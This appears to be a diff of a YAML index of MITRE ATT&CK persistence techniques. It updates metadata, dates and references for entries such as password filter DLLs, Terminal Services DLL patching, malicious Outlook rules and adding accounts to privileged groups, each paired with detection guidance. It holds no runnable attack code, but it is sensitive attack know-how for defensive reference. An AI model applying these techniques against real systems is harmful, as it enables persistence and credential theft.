       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29206,35 +29576,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29258,71 +29603,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29331,24 +29665,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29440,8 +29806,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29472,71 +29838,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29567,7 +30001,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29622,13 +30056,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29689,9 +30121,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29700,7 +30132,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29753,7 +30184,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29774,12 +30205,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29863,11 +30293,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29880,7 +30309,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -29893,7 +30321,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -29923,7 +30350,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -29955,7 +30383,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29977,8 +30405,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30004,7 +30430,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30030,36 +30456,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
